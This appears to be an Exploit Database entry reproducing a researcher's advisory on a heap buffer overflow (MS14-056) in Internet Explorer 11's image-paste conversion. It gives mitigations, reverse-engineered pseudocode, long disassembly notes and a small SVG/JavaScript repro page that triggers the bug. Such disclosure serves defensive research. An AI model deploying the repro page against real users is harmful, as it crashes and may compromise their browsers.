Microsoft Internet Explorer 11 – MSHTML CPasteCommand::ConvertBitmaptoPng Heap Buffer Overflow (MS14-056)

Exploit Database
18 阅读
作者： Skylined

日期： 2016-12-22
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/40960/
<!--
Source: http://blog.skylined.nl/20161221001.html

Synopsis

A specially crafted web-page can trigger an out-of-bounds write in Microsoft Internet Explorer 11. Code that handles pasting images from the clipboard uses an incorrect buffer length, which allows writing beyond the boundaries of a heap-based buffer. An attacker able to trigger this vulnerability can execute arbitrary code.

Known affected software, attack vectors and potential mitigations

Microsoft Internet Explorer 11.0.9600.16521

An attacker would need to get a target user to open a specially crafted web-page. In order to trigger the issue, the web-page needs to either programmatically copy/paste an image using Javascript or get the user to do this (for instance by tricking the user into typing keyboard shortcuts such as CTRL+C/CTRL+V) . By default, MSIE prompts the user to allow or disallow programmatically copy/pasting the first time a website tries to do this, so user-interaction is normally required in such cases. Disabling the Allow Programmatic clipboard access setting in Internet Options -> Security Settings -> [Choose a zone] -> Scripting should prevent websites from programmatically copy/pasting an image. Disabling execution of scripts on web-pages altogether will have the same effect. Please note that neither option prevents a website from social engineering the user into typing a keyboard shortcut to copy/paste the image.

Details

When an image is pasted in MSHTML, it gets converted from BMP format to PNG. This is done in the MSHTML!CPasteCommand::ConvertBitmaptoPng function. This function incorrectly uses the size of the original BMP image to allocate memory for storing the converted PNG image. The PNG image will be smaller than the BMP under most circumstances, but if a specially crafted image leads to the original BMP image being smaller than the converted PNG, the function will write PNG data beyond the bounds of the allocated memory.

Here is some pseudo code that was created by reverse engineering the CPasteCommand::ConvertBitmaptoPng function, which shows the vulnerability:

ConvertBitmaptoPng(
[IN] VOID* poBitmap,UINT uBitmapSize,
[OUT] VOID** ppoPngImage, UINT* puPngImageSize
) {
// Convert a BMP formatted image to a PNG formatted image.
CMemStm* poCMemStm;
IWICStream* poWicBitmap;
STATSTG oStatStg;
TSmartArray<unsigned char> poPngImage;
UINT uReadSize;
// Create a CMemStm for the PNG image.
CreateStreamOnHGlobal(NULL, True, poCMemStm);
// Create an IWICStream from the BMP image.
InitializeFromMemory(poBitMap, uBitmapSize,
&GUID_ContainerFormatBmp, &poWicBitmap)));
// Write BMP image in IWICStream to PNG image in CMemStm
WriteWicBitmapToStream(poWicBitmap, &GUID_ContainerFormatPng, poCMemStm);
// Get size of PNG image in CMemStm and save it to the output variable.
oCMemStm->Stat(&oStatStg, 0);
*puPngImageSize = oStatStg.cbSize.LowPart;
// Allocate memory for the PNG
poPngImage->New(uBitmapSize);
// Go to start of PNG image in CMemStm
poCMemStm->Seek(0, STREAM_SEEK_SET, NULL, &pPositionLow);
// Read PNG image in CMemStm to allocated memory.
poCMemStm->Read(poPngImage, *puPngImageSize, &uReadSize);
// Save location of allocated memory with PNG image to output variable.
*ppoPngImage = poPngImage;
}

Notes:

The code uses the wrong size to allocate memory in poPngImage->New(uBitmapSize);. Changing this line of code to poPngImage->New(*puPngImageSize); should address the issue.
The PNG image is written to the allocated memory in poCMemStm->Read(poPngImage, *puPngImageSize, &uReadSize);. This is where the code can potentially write beyond the boundaries of the allocated memory if uBitmapSize is smaller than *puPngImageSize.

Repro.svg:
-->

<svg style="width:1px; height: 1px;" xmlns="http://www.w3.org/2000/svg">
<script>
window.onload = function () {
document.designMode="on";
document.execCommand("SelectAll");/*exec*/
window.getSelection().collapseToEnd();/*js_om*/
document.execCommand("Copy");/*exec*/
document.execCommand("Paste", false);/*exec*/
}
</script>
</svg>

<!--
Below are my notes from reversing the code for your viewing pleasure. There are a few flaws/omissions in the parts that are not directly relevant to the bug, as I did not attempt to finish all the details after I figured out enough to determine root cause, exploitability and attack vectors.

MSHTML!CPasteCommand..ConvertBitmaptoPng.txt
MSHTML!CPasteCommand::ConvertBitmaptoPng( 
VOID* poBitmap<ebp+8>,
UINT uBitmapSize<ebp+c>,
BYTE[]** ppoPngImage<ebp+10>, 
UINT* puPngImageSize<ebp+14>):
-50 STATSTG oStatStg {
-50 00 04 LPOLESTR pwcsName;
-4C 04 04 DWORDtype;
-48 08 08 ULARGE_INTEGER cbSize;
-40 10 08 FILETIME mtime; 
-38 18 08 FILETIME ctime; 
-30 20 08 FILETIME atime; 
-28 28 04 DWORDgrfMode; 
-24 2C 04 DWORDgrfLocksSupported; 
-20 30 10 CLSIDclsid; 
-10 34 04 DWORDgrfStateBits;
-0C 38 04 DWORDreserved;
} size = 3C 
-54 CMemStm* poCMemStm
-58 VOID* poWicBitmap 
-5C UCHAR[]* poPngImage (TSmartArray)
-60 UINT uReadSize
-64 BYTE[]** ppoPngImage
-70 DWORD pPositionLow // lower DWORD of 64 bit position in stream. 

6f3818fd 8bffmov edi,edi
6f3818ff 55pushebp
6f381900 8becmov ebp,esp
6f381902 83ec74sub esp,74h
6f381905 a13c03436fmov eax,dword ptr [MSHTML!__security_cookie (6f43033c)]
6f38190a 33c5xor eax,ebp
6f38190c 8945fcmov dword ptr [ebp-4],eax
6f38190f 8b4510mov eax,dword ptr [ebp+10h]ppoPngImage<eax> = ppoPngImage<stack> 
6f381912 8d4daclea ecx,[ebp-54h]&poCMemStm<ecx> = &poCMemStm<stack> 
6f381915 53pushebx//save reg
6f381916 8b5d14mov ebx,dword ptr [ebp+14h]puPngImageSize<ebx> = puPngImageSize<stack> 
6f381919 56pushesi//save reg
6f38191a 8b7508mov esi,dword ptr [ebp+8]poBitmap<esi> = poBitmap<ebp+8> 
6f38191d 57pushedi//save reg
6f38191e 33ffxor edi,edi<edi> = 0 
6f381920 89459cmov dword ptr [ebp-64h],eaxppoPngImage<stack> = ppoPngImage<eax> 
6f381923 897da8mov dword ptr [ebp-58h],edipoWicBitmap<stack> = 0<edi> poWicBitmap = 0
6f381926 897dacmov dword ptr [ebp-54h],edipoCMemStm<stack> = 0<edi> poCMemStm = 0
6f381929 e8566827ffcall6e5f8184 pSmartStreamPointer<eax> = MSHTML!TSmartPointer<pSmartStreamPointer = &(TSmartPointer<...>(&poCMemStm))
Windows::Foundation::IAsyncOperation< 
Windows::Storage::Streams::IRandomAccessStream *
> 
>::operator&( 
&poCMemStm) 
6f38192e 50pusheaxlarg3<stack> = pSmartStreamPointer<eax> 
6f38192f 6a01push1larg2<stack> = 1
6f381931 57pushedilarg1<stack> = 0<edi> 
6f381932 ff1520c0426fcalldword ptr [6f42c020] HRESULT hResult<eax> = combase!CreateStreamOnHGlobal( if (FAILED(hResult = combase!CreateStreamOnHGlobal(NULL, True, pSmartStreamPointer)))
hGlobal = NULL, 
fDeleteOnRelease = True,
ppstm = pSmartStreamPointer<eax>);
6f381938 8bf8mov edi,eaxhResult<edi> = hResult<eax> 
6f38193a 85fftestedi,ediif (hResult<edi> < 0) 
6f38193c 0f88b8000000js6f3819fa goto exit_label_1 goto exit_label_1;
6f381942 8b550cmov edx,dword ptr [ebp+0Ch]larg1<edx> = uBitmapSize<stack> 
6f381945 8d45a8lea eax,[ebp-58h]&poWicBitmap<eax> = &(poWicBitmap<stack>) 
6f381948 50pusheaxlarg3<stack> = &poWicBitmap<eax>
6f381949 6860147a6epush6e7a1460 larg2<stack> = &GUID_ContainerFormatBmp 
6f38194e 8bcemov ecx,esilarg1<ecx> = poBitmap<esi>
6f381950 e8c8325dffcall6e954c1d hResult<eax> = MSHTML!InitializeFromMemory( if (FAILED(hResult = InitializeFromMemory(poBitMap, uBitmapSize, &GUID_ContainerFormatBmp, &poWicBitmap)))
poBitmap, 
uBitmapSize,
&GUID_ContainerFormatBmp<dll>,
&poWicBitmap);
6f381955 8bf8mov edi,eaxhResult<edi> = hResult<eax> 
6f381957 85fftestedi,ediif (hResult < 0)
6f381959 0f889b000000js6f3819fa goto exit_label_1 goto exit_label_1;
6f38195f ff75acpushdword ptr [ebp-54h]larg3<stack> = poCMemStm<stack> 
6f381962 8b4da8mov ecx,dword ptr [ebp-58h]larg1<ecx> = poWicBitmap<stack> 
6f381965 ba24a4736emov edx,6e73a424 larg2<edx> = &GUID_ContainerFormatPng<dll>
6f38196a e8e4f6e6ffcall6f1f1053 hResult<eax> = MSHTML!WriteWicBitmapToStream( if (FAILED(hResult = WriteWicBitmapToStream(poWicBitmap, &GUID_ContainerFormatPng, poCMemStm)))
poWicBitmap,
&GUID_ContainerFormatPng, 
poCMemStm)
6f38196f 8bf8mov edi,eaxhResult<edi> = hResult<eax> 
6f381971 85fftestedi,ediif (hResult<edi> < 0) 
6f381973 0f8881000000js6f3819fa goto exit_label_1 goto exit_label_1;
6f381979 8b45acmov eax,dword ptr [ebp-54h]poCMemStm<eax> = poCMemStm<stack> 
6f38197c 8d55b0lea edx,[ebp-50h]&oStatStg<edx> = &(oStatStg<stack>) 
6f38197f 33f6xor esi,esi0<esi> = 0
6f381981 56pushesilarg3<stack> = 0<esi> 
6f381982 52pushedxlarg2<stack> = &oStatStg<edx> 
6f381983 8b08mov ecx,dword ptr [eax]afVFTable<ecx> = poCMemStm<eax>->afVFTable
6f381985 50pusheaxlarg1<stack> = poCMemStm<eax> 
6f381986 ff5130calldword ptr [ecx+30h]hResult<eax> = poCMemStm->Stat(&oStatStg, 0)if (FAILED(hResult = poCMemStm->Stat(&oStatStg, 0)))
6f381989 8bf8mov edi,eaxhResult<edi> = hResult<eax> 
6f38198b 85fftestedi,ediif (hResult<edi> < 0) 
6f38198d 786bjs6f3819fa goto exit_label_1 goto exit_label_1;
6f38198f 8b45b8mov eax,dword ptr [ebp-48h]uPngImageSize<eax> = oStatStg<stack>.cbSize.LowPart 
6f381992 8d4da4lea ecx,[ebp-5Ch]&poPngImage<ecx> = &(poPngImage<stack>) 
6f381995 ff750cpushdword ptr [ebp+0Ch]uBitmapSize<stack> = uBitmapSize<stack> 
6f381998 8903mov dword ptr [ebx],eax*puPngImageSize<ebx> = uPngImageSize<eax> *puPngImageSize = oStatStg.cbSize.LowPart
6f38199a 8975a4mov dword ptr [ebp-5Ch],esipoPngImage<stack> = 0<esi>ppoPngImage = NULL
6f38199d e8c34453ffcall6e8b5e65 MSHTML!TSmartArray<unsigned char>::New( if (FAILED(hResult = poPngImage->New(uBitmapSize)))
uBitmapSize<stack>) 
6f3819a2 8bf8mov edi,eaxhResult<edi> = hResult<eax> 
6f3819a4 85fftestedi,ediif (hResult<edi> >= 0)
6f3819a6 7905jns 6f3819ad goto skip_1 
free_and_exit_label_2:
6f3819a8 8b4da4mov ecx,dword ptr [ebp-5Ch]poPngImage<ecx> = poPngImage<stack> goto free_poPngImage_and_exit
6f3819ab eb48jmp 6f3819f5 goto free_and_exit_label_1
skip_1: 
6f3819ad 8b45acmov eax,dword ptr [ebp-54h]poCMemStm<eax> = poCMemStm<stack> 
6f3819b0 8d5590lea edx,[ebp-70h]&pPositionLow<edx> = &(pPositionLow<stack>) 
6f3819b3 52pushedxlarg3.2 = &pPositionLow<edx>
6f3819b4 56pushesilarg3.1 = 0<esi>
6f3819b5 56pushesilarg2.2 = 0<esi>
6f3819b6 8b08mov ecx,dword ptr [eax]afVFTable<ecx> = poCMemStm<eax>->afVFTable
6f3819b8 56pushesilarg2.1 = 0<esi>
6f3819b9 50pusheaxlarg1 = poCMemStm<eax>
6f3819ba ff5114calldword ptr [ecx+14h]hResult<eax> = poCMemStm->Seek( if (FAILED(hResult = poCMemStm->Seek(0, STREAM_SEEK_SET, NULL, &pPositionLow)))
0,
STREAM_SEEK_SET,
NULL, 
&pPositionLow)
6f3819bd 8bf8mov edi,eaxhResult<edi> = hResult<eax> 
6f3819bf 85fftestedi,ediif (hResult<edi> < 0) 
6f3819c1 78e5js6f3819a8 goto free_and_exit_label_2goto free_poPngImage_and_exit
6f3819c3 8b45acmov eax,dword ptr [ebp-54h]poCMemStm<eax> = poCMemStm<stack> 
6f3819c6 8d55a0lea edx,[ebp-60h]&uReadSize<edx> = &(uReadSize<stack>) 
6f3819c9 8b75a4mov esi,dword ptr [ebp-5Ch]poPngImage<esi> = poPngImage<stack> 
6f3819cc 52pushedxlarg4 = &uReadSize<edx> 
6f3819cd ff33pushdword ptr [ebx]larg3 = *puPngImageSize<ebx>
6f3819cf 8b08mov ecx,dword ptr [eax]afVFTable<ecx> = poCMemStm<eax>->afVFTable
6f3819d1 56pushesilarg2 = poPngImage<esi> 
6f3819d2 50pusheaxlarg1 = <eax> 
6f3819d3 ff510ccalldword ptr [ecx+0Ch]hResult = poCMemStm->Read(if (FAILED(poCMemStm->Read(poPngImage, *puPngImageSize, &uReadSize)))
poPngImage, 
 ************** *puPngImageSize,
&uReadSize) 
6f3819d6 8bf8mov edi,eaxhResult<edi> = hResult<eax> 
6f3819d8 85fftestedi,ediif (hResult<edi> >= 0)goto free_poPngImage_and_exit
6f3819da 7904jns 6f3819e0 goto skip_label_2 
6f3819dcgoto free_and_exit_label_3
skip_label_2: 
6f3819e0 8b03mov eax,dword ptr [ebx]uPngInfoSize<eax> = *puPngImageSize<ebx>
6f3819e2 3b45a0cmp eax,dword ptr [ebp-60h]if (uPngInfoSize<eax> == uReadSize<stack>)if (uPngInfoSize != uReadSize) {
6f3819e5 7407je6f3819ee goto skip_label_3 
6f3819e7 bfffff0080mov edi,8000FFFFhhResult<edi> = 0x8000FFFF (Error: Catastrophic failure) hResult = 0x8000FFFF (Error: Catastrophic failure)
6f3819ec ebeejmp 6f3819dc goto free_and_exit_label_3goto free_poPngImage_and_exit
free_and_exit_label_3:}
6f3819dc 8bcemov ecx,esipoPngImage<ecx> = poPngImage<esi> 
6f3819de eb15jmp 6f3819f5 goto free_and_exit_label_1

skip_label_3: 
6f3819ee 8b459cmov eax,dword ptr [ebp-64h]ppoPngImage<eax> = ppoPngImage<stack> 
6f3819f1 33c9xor ecx,ecxpoPngImage<ecx> = NULL
6f3819f3 8930mov dword ptr [eax],esi*ppoPngImage<eax> = poPngImage<esi> *ppoPngImage = poPngImage, poPngImage = NULL

free_and_exit_label_1:free_poPngImage_and_exit:
6f3819f5 e881f620ffcall6e59107b MSHTML!ProcessHeapFree(poPngImage<ecx>) ProcessHeapFree(poPngImage)
exit_label_1: 
6f3819fa 8d4daclea ecx,[ebp-54h]&poCMemStm<ecx> = &(poCMemStm<stack>) 
6f3819fd e89f4b25ffcall6e5d65a1 MSHTML!SP<Tree::GridTrackList>::~SP<Tree::GridTrackList>( 
&poCMemStm<ecx>)
6f381a02 8d4da8lea ecx,[ebp-58h]&poWicBitmap<ecx> = &(poWicBitmap<stack>) 
6f381a05 e8974b25ffcall6e5d65a1 MSHTML!SP<Tree::GridTrackList>::~SP<Tree::GridTrackList>( 
&poWicBitmap<ecx>)
6f381a0a 8b4dfcmov ecx,dword ptr [ebp-4]
6f381a0d 8bc7mov eax,edireturn hResult<edi> 
6f381a0f 5fpop edi
6f381a10 5epop esi
6f381a11 33cdxor ecx,ebp
6f381a13 5bpop ebx
6f381a14 e8f7f520ffcallMSHTML!__security_check_cookie (6e591010)
6f381a19 8be5mov esp,ebp
6f381a1b 5dpop ebp
6f381a1c c21000ret 10h
6f381a1f 90nop
6f381a20 90nop
6f381a21 90nop
6f381a22 90nop
6f381a23 90nop

MSHTML!CPasteCommand..PasteFromClipboard.txt
MSHTML!CPasteCommand::PasteFromClipboard(
self<ecx>,
xArg1<ebp+8>,
xArg2<ebp+C>,
xArg3<ebp+10>,
xArg4<ebp+14>,
xArg5<ebp+18>,
xArg6<ebp+1C>,
xArg7<ebp+20>,
xArg8<ebp+24>):
esp+34 = VOID* var34 (poBitmap)
esp+38 = BYTE[]* var38 (pabImageData)
esp+4C = UINT var4C (uBitmapSize)
esp+50 = UINT var50 (uBitmapInfoSize / uPngImageSize)

MSHTML!CPasteCommand::PasteFromClipboard:

72cf6235 8bffmov edi,edi
72cf6237 55pushebp
72cf6238 8becmov ebp,esp
72cf623a 83e4f8and esp,0FFFFFFF8h
72cf623d 83ec74sub esp,74h
72cf6240 53pushebx
72cf6241 56pushesi
72cf6242 57pushedi
72cf6243 8bd9mov ebx,ecx
72cf6245 e8b1cdfdffcallMSHTML!CCommand::Doc (72cd2ffb)
72cf624a 50pusheax
72cf624b 8d4c2478lea ecx,[esp+78h]
72cf624f e86fb1afffcallMSHTML!CPasteOperationState::CPasteOperationState (727f13c3)
72cf6254 33ffxor edi,edi
72cf6256 8bcbmov ecx,ebx
72cf6258 897c243cmov dword ptr [esp+3Ch],edi
72cf625c 897c2410mov dword ptr [esp+10h],edi
72cf6260 897c2430mov dword ptr [esp+30h],edi
72cf6264 897c2468mov dword ptr [esp+68h],edi
72cf6268 897c246cmov dword ptr [esp+6Ch],edi
72cf626c 897c2470mov dword ptr [esp+70h],edi
72cf6270 897c2414mov dword ptr [esp+14h],edi
72cf6274 897c2424mov dword ptr [esp+24h],edi
72cf6278 e87ecdfdffcallMSHTML!CCommand::Doc (72cd2ffb)
72cf627d 8b4b08mov ecx,dword ptr [ebx+8]
72cf6280 8bf0mov esi,eax
72cf6282 83c110add ecx,10h
72cf6285 897c2428mov dword ptr [esp+28h],edi
72cf6289 897c242cmov dword ptr [esp+2Ch],edi
72cf628d 897c2440mov dword ptr [esp+40h],edi
72cf6291 6a01push1
72cf6293 8b01mov eax,dword ptr [ecx]
72cf6295 89742454mov dword ptr [esp+54h],esi
72cf6299 897c241cmov dword ptr [esp+1Ch],edi
72cf629d 897c2420mov dword ptr [esp+20h],edi
72cf62a1 ff503ccalldword ptr [eax+3Ch]
72cf62a4 56pushesi
72cf62a5 8d4c2460lea ecx,[esp+60h]
72cf62a9 8944245cmov dword ptr [esp+5Ch],eax
72cf62ad 897c2464mov dword ptr [esp+64h],edi
72cf62b1 e8899265ffcallMSHTML!CEnableDeferringAccessibilityEvents::CEnableDeferringAccessibilityEvents (7234f53f)
72cf62b6 8b7d08mov edi,dword ptr [ebp+8]
72cf62b9 8bcfmov ecx,edi
72cf62bb 8b07mov eax,dword ptr [edi]
72cf62bd ff9080000000calldword ptr [eax+80h]
72cf62c3 85c0testeax,eax
72cf62c5 0f84fd050000jeMSHTML!CPasteCommand::PasteFromClipboard+0x693 (72cf68c8)
72cf62cb 8b4d0cmov ecx,dword ptr [ebp+0Ch]
72cf62ce 8b01mov eax,dword ptr [ecx]
72cf62d0 ff9080000000calldword ptr [eax+80h]
72cf62d6 85c0testeax,eax
72cf62d8 0f84ea050000jeMSHTML!CPasteCommand::PasteFromClipboard+0x693 (72cf68c8)
72cf62de 837d2000cmp dword ptr [ebp+20h],0
72cf62e2 741cjeMSHTML!CPasteCommand::PasteFromClipboard+0xcb (72cf6300)
72cf62e4 8bcbmov ecx,ebx
72cf62e6 e810cdfdffcallMSHTML!CCommand::Doc (72cd2ffb)
72cf62eb 8bf0mov esi,eax
72cf62ed 8bcfmov ecx,edi
72cf62ef 8b07mov eax,dword ptr [edi]
72cf62f1 ff5078calldword ptr [eax+78h]
72cf62f4 50pusheax
72cf62f5 8d8e7c010000lea ecx,[esi+17Ch]
72cf62fb e8bd2967ffcallMSHTML!TSmartPointer<CMarkup>::operator= (72368cbd)
72cf6300 8b4b08mov ecx,dword ptr [ebx+8]
72cf6303 8d542418lea edx,[esp+18h]
72cf6307 8d4910lea ecx,[ecx+10h]
72cf630a e8ea7062ffcallMSHTML!CreateMarkupPointer2 (7231d3f9)
72cf630f 8bf0mov esi,eax
72cf6311 85f6testesi,esi
72cf6313 0f88b4050000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6319 8b4c2418mov ecx,dword ptr [esp+18h]
72cf631d 57pushedi
72cf631e 51pushecx
72cf631f 8b01mov eax,dword ptr [ecx]
72cf6321 ff5030calldword ptr [eax+30h]
72cf6324 8bf0mov esi,eax
72cf6326 85f6testesi,esi
72cf6328 0f889f050000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf632e 8b4c2418mov ecx,dword ptr [esp+18h]
72cf6332 6a00push0
72cf6334 51pushecx
72cf6335 8b01mov eax,dword ptr [ecx]
72cf6337 ff5014calldword ptr [eax+14h]
72cf633a 8bf0mov esi,eax
72cf633c 85f6testesi,esi
72cf633e 0f8889050000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6344 8b4b08mov ecx,dword ptr [ebx+8]
72cf6347 8d54241clea edx,[esp+1Ch]
72cf634b 8d4910lea ecx,[ecx+10h]
72cf634e e8a67062ffcallMSHTML!CreateMarkupPointer2 (7231d3f9)
72cf6353 8bf0mov esi,eax
72cf6355 85f6testesi,esi
72cf6357 0f8870050000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf635d 8b4c241cmov ecx,dword ptr [esp+1Ch]
72cf6361 57pushedi
72cf6362 51pushecx
72cf6363 8b01mov eax,dword ptr [ecx]
72cf6365 ff5030calldword ptr [eax+30h]
72cf6368 8bf0mov esi,eax
72cf636a 85f6testesi,esi
72cf636c 0f885b050000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6372 8b4c241cmov ecx,dword ptr [esp+1Ch]
72cf6376 6a01push1
72cf6378 51pushecx
72cf6379 8b01mov eax,dword ptr [ecx]
72cf637b ff5014calldword ptr [eax+14h]
72cf637e 8bf0mov esi,eax
72cf6380 85f6testesi,esi
72cf6382 0f8845050000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6388 8b03mov eax,dword ptr [ebx]
72cf638a 8d4c2448lea ecx,[esp+48h]
72cf638e 51pushecx
72cf638f 8d4c2458lea ecx,[esp+58h]
72cf6393 51pushecx
72cf6394 8d4c241clea ecx,[esp+1Ch]
72cf6398 51pushecx
72cf6399 8bcbmov ecx,ebx
72cf639b ff5030calldword ptr [eax+30h]
72cf639e 8bf0mov esi,eax
72cf63a0 85f6testesi,esi
72cf63a2 0f8825050000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf63a8 8b442450mov eax,dword ptr [esp+50h]
72cf63ac 85c0testeax,eax
72cf63ae 741ejeMSHTML!CPasteCommand::PasteFromClipboard+0x199 (72cf63ce)
72cf63b0 6afepush0FFFFFFFEh
72cf63b2 59pop ecx
72cf63b3 663b88840e0000cmp cx,word ptr [eax+0E84h]
72cf63ba 7512jne MSHTML!CPasteCommand::PasteFromClipboard+0x199 (72cf63ce)
72cf63bc 66894c2464mov word ptr [esp+64h],cx
72cf63c1 33c9xor ecx,ecx
72cf63c3 89442460mov dword ptr [esp+60h],eax
72cf63c7 668988840e0000mov word ptr [eax+0E84h],cx
72cf63ce 837d1000cmp dword ptr [ebp+10h],0
72cf63d2 7558jne MSHTML!CPasteCommand::PasteFromClipboard+0x1f7 (72cf642c)
72cf63d4 8d44243clea eax,[esp+3Ch]
72cf63d8 50pusheax
72cf63d9 ff15b8c1d972calldword ptr [MSHTML!_imp__OleGetClipboard (72d9c1b8)]
72cf63df 8bf0mov esi,eax
72cf63e1 85f6testesi,esi
72cf63e3 0f85e4040000jne MSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf63e9 8d44242clea eax,[esp+2Ch]
72cf63ed 50pusheax
72cf63ee b8c0bfff71mov eax,offset MSHTML!IID_IDocHostUIHandler (71ffbfc0)
72cf63f3 50pusheax
72cf63f4 50pusheax
72cf63f5 8b4308mov eax,dword ptr [ebx+8]
72cf63f8 ff7018pushdword ptr [eax+18h]
72cf63fb e854465dffcallMSHTML!CDocument::QueryService (722caa54)
72cf6400 8b4c242cmov ecx,dword ptr [esp+2Ch]
72cf6404 8b54243cmov edx,dword ptr [esp+3Ch]
72cf6408 895510mov dword ptr [ebp+10h],edx
72cf640b 85c9testecx,ecx
72cf640d 741djeMSHTML!CPasteCommand::PasteFromClipboard+0x1f7 (72cf642c)
72cf640f 8b01mov eax,dword ptr [ecx]
72cf6411 8d742428lea esi,[esp+28h]
72cf6415 56pushesi
72cf6416 52pushedx
72cf6417 51pushecx
72cf6418 ff5044calldword ptr [eax+44h]
72cf641b 85c0testeax,eax
72cf641d 750djne MSHTML!CPasteCommand::PasteFromClipboard+0x1f7 (72cf642c)
72cf641f 39442428cmp dword ptr [esp+28h],eax
72cf6423 7407jeMSHTML!CPasteCommand::PasteFromClipboard+0x1f7 (72cf642c)
72cf6425 8b442428mov eax,dword ptr [esp+28h]
72cf6429 894510mov dword ptr [ebp+10h],eax
72cf642c 8b4b08mov ecx,dword ptr [ebx+8]
72cf642f 8d442424lea eax,[esp+24h]
72cf6433 50pusheax
72cf6434 57pushedi
72cf6435 e886255affcallMSHTML!CHTMLEditor::GetFlowElement (722989c0)
72cf643a 8bf0mov esi,eax
72cf643c 85f6testesi,esi
72cf643e 0f8889040000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6444 8b442424mov eax,dword ptr [esp+24h]
72cf6448 85c0testeax,eax
72cf644a 750ajne MSHTML!CPasteCommand::PasteFromClipboard+0x221 (72cf6456)
72cf644c c744244401000000 mov dword ptr [esp+44h],1
72cf6454 eb3ajmp MSHTML!CPasteCommand::PasteFromClipboard+0x25b (72cf6490)
72cf6456 8b30mov esi,dword ptr [eax]
72cf6458 8d4c2440lea ecx,[esp+40h]
72cf645c e82e5462ffcallMSHTML!CSmartPtr<IHTMLElement3>::operator& (7231b88f)
72cf6461 50pusheax
72cf6462 6854e82172pushoffset MSHTML!IID_IHTMLElement3 (7221e854)
72cf6467 ff74242cpushdword ptr [esp+2Ch]
72cf646b ff16calldword ptr [esi]
72cf646d 8bf0mov esi,eax
72cf646f 85f6testesi,esi
72cf6471 0f8856040000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6477 8b442440mov eax,dword ptr [esp+40h]
72cf647b 8d542444lea edx,[esp+44h]
72cf647f 52pushedx
72cf6480 50pusheax
72cf6481 8b08mov ecx,dword ptr [eax]
72cf6483 ff5124calldword ptr [ecx+24h]
72cf6486 8bf0mov esi,eax
72cf6488 85f6testesi,esi
72cf648a 0f883d040000jsMSHTML!CPasteCommand::PasteFromClipboard+0x698 (72cf68cd)
72cf6490 8b7c2454mov edi,dword ptr [esp+54h]
72cf6494 6bc714imuleax,edi,14h
72cf6497 01442414add dword ptr [esp+14h],eax
72cf649b e9cc010000jmp MSHTML!CPasteCommand::PasteFromClipboard+0x437 (72cf666c)
72cf64a0 66837c244400cmp word ptr [esp+44h],0
72cf64a6 750ejne MSHTML!CPasteCommand::PasteFromClipboard+0x281 (72cf64b6)
72cf64a8 83ff03cmp edi,3
72cf64ab 7409jeMSHTML!CPasteCommand::PasteFromClipboard+0x281 (72cf64b6)
72cf64ad 83ff02cmp edi,2
72cf64b0 0f85b0010000jne MSHTML!CPasteCommand::PasteFromClipboard+0x431 (72cf6666)
72cf64b6 8b4d10mov ecx,dword ptr [ebp+10h]
72cf64b9 ff742414pushdword ptr [esp+14h]
72cf64bd 51pushecx
72cf64be 8b01mov eax,dword ptr [ecx]
72cf64c0 ff5014calldword ptr [eax+14h]
72cf64c3 85c0testeax,eax
72cf64c5 0f859b010000jne MSHTML!CPasteCommand::PasteFromClipboard+0x431 (72cf6666)
72cf64cb 83ff04cmp edi,4
72cf64ce 7418jeMSHTML!CPasteCommand::PasteFromClipboard+0x2b3 (72cf64e8)
72cf64d0 83ff01cmp edi,1
72cf64d3 7413jeMSHTML!CPasteCommand::PasteFromClipboard+0x2b3 (72cf64e8)
72cf64d5 83ff03cmp edi,3
72cf64d8 740ejeMSHTML!CPasteCommand::PasteFromClipboard+0x2b3 (72cf64e8)
72cf64da 83ff02cmp edi,2
72cf64dd 7409jeMSHTML!CPasteCommand::PasteFromClipboard+0x2b3 (72cf64e8)
72cf64df 85fftestedi,edi
72cf64e1 7405jeMSHTML!CPasteCommand::PasteFromClipboard+0x2b3 (72cf64e8)
72cf64e3 83ff08cmp edi,8
72cf64e6 7524jne MSHTML!CPasteCommand::PasteFromClipboard+0x2d7 (72cf650c)
72cf64e8 8b4d10mov ecx,dword ptr [ebp+10h]
72cf64eb 8d542468lea edx,[esp+68h]
72cf64ef 52pushedx
72cf64f0 ff742418pushdword ptr [esp+18h]
72cf64f4 8b01mov eax,dword ptr [ecx]
72cf64f6 51pushecx
72cf64f7 ff500ccalldword ptr [eax+0Ch]
72cf64fa 85c0testeax,eax
72cf64fc 0f8564010000jne MSHTML!CPasteCommand::PasteFromClipboard+0x431 (72cf6666)
72cf6502 8b44246cmov eax,dword ptr [esp+6Ch]
72cf6506 89442410mov dword ptr [esp+10h],eax
72cf650a eb04jmp MSHTML!CPasteCommand::PasteFromClipboard+0x2db (72cf6510)
72cf650c 8b442410mov eax,dword ptr [esp+10h]
72cf6510 85fftestedi,edi
72cf6512 0f84f8000000jeMSHTML!CPasteCommand::PasteFromClipboard+0x3db (72cf6610)
72cf6518 83ff01cmp edi,1
72cf651b 744djeMSHTML!CPasteCommand::PasteFromClipboard+0x335 (72cf656a)
72cf651d 83ff02cmp edi,2
72cf6520 0f84d1020000jeMSHTML!CPasteCommand::PasteFromClipboard+0x5c2 (72cf67f7)
72cf6526 0f8e3a010000jle MSHTML!CPasteCommand::PasteFromClipboard+0x431 (72cf6666)
72cf652c 83ff04cmp edi,4
72cf652f 0f8e0d020000jle MSHTML!CPasteCommand::PasteFromClipboard+0x50d (72cf6742)
72cf6535 83ff08cmp edi,8
72cf6538 0f8528010000jne MSHTML!CPasteCommand::PasteFromClipboard+0x431 (72cf6666)
72cf653e 50pusheax
72cf653f ff15e043dc72calldword ptr [MSHTML!_imp__GlobalLock (72dc43e0)]
72cf6545 8bf8mov edi,eax
72cf6547 8b442410mov eax,dword ptr [esp+10h]
72cf654b 89442420mov dword ptr [esp+20h],eax
72cf654f 85fftestedi,edi
72cf6551 0f8524010000jne MSHTML!CPasteCommand::PasteFromClipboard+0x446 (72cf667b)
72cf6557 be0e000780mov esi,8007000Eh
